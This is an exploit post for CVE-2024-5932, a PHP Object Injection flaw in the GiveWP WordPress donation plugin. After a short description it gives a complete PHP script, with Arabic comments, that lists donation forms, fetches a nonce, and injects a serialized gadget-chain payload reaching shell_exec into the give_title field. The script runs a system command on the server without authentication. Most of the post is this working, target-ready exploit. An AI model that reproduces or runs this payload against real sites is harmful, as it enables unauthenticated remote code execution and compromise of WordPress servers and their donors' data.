=============================================================================================================================================
| # Title     : GiveWP Donation 3.14.1 PHP Object Injection vulnerability                                                                   |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://givewp.com                                                                                                          |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:  This PHP script demonstrates a proof-of-concept exploit for a PHP Object Injection vulnerability in the WordPress plugin GiveWP.

What the script does:

Sends AJAX requests to the WordPress admin-ajax.php endpoint using cURL.

Enumerates donation forms by calling the give_form_search action.

Selects a random form and retrieves its required nonce/hash via give_donation_form_nonce.

Builds a malicious serialized PHP payload that abuses unsafe object deserialization chains within GiveWP and its dependencies.

Injects the payload into a donation request parameter (give_title).

Triggers deserialization during donation processing (give_process_donation), aiming to execute a system command (e.g., whoami) via a gadget chain that reaches shell_exec.

Outputs the server response, which may contain command execution results if the target is vulnerable.

Impact:

Successful exploitation can lead to remote code execution (RCE) on the vulnerable WordPress server.

The attack requires no authentication if the affected AJAX actions are exposed.


    (Related : https://packetstorm.news/files/id/180463/ Related CVE numbers:	CVE-2024-5932 ) .
	
[+] Payload : 

[+] Set Target : line 17

[+] Usage : php poc.php 

[+] PayLoad :

<?php

// استغلال ثغرة PHP Object Injection في إضافة GiveWP لووردبريس

function send_request($url, $data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/x-www-form-urlencoded']);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}

$target = "http://victim-site.com"; // استبدل بعنوان الموقع المستهدف

// الحصول على قائمة النماذج
$form_list = send_request("$target/wp-admin/admin-ajax.php", "action=give_form_search");
$form_list = json_decode($form_list, true);
if (empty($form_list)) {
    die("فشل في جلب قائمة النماذج.");
}

// اختيار نموذج عشوائي
$selected_form = $form_list[array_rand($form_list)];
$form_id = $selected_form['id'];

// جلب بيانات الاستغلال
$form_data = send_request("$target/wp-admin/admin-ajax.php", "action=give_donation_form_nonce&give_form_id=$form_id");
$form_data = json_decode($form_data, true);
if (!isset($form_data['data'])) {
    die("فشل في جلب بيانات النموذج.");
}
$form_hash = $form_data['data'];

// تحميل الحمولة (Payload)
$payload = 'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";' .
           'O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{' .
           's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";' .
           'O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:12:"\0*\0validator";' .
           's:10:"shell_exec";s:12:"\0*\0generator";' .
           'O:34:"Give\\Onboarding\\SettingsRepository":1:{' .
           's:11:"\0*\0settings";a:1:{s:8:"address1";s:'.strlen('whoami').':"whoami";}}' .
           's:13:"\0*\0maxRetries";i:10;}}}}}}';

// تنفيذ الاستغلال
$data = http_build_query([
    'give-form-id' => $form_id,
    'give-form-hash' => $form_hash,
    'give-price-id' => '0',
    'give-amount' => '$10.00',
    'give_first' => 'John',
    'give_last' => 'Doe',
    'give_email' => 'test@example.com',
    'give_title' => $payload,
    'give-gateway' => 'offline',
    'action' => 'give_process_donation'
]);

$response = send_request("$target/wp-admin/admin-ajax.php", $data);
echo "Response: \n$response\n";

?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================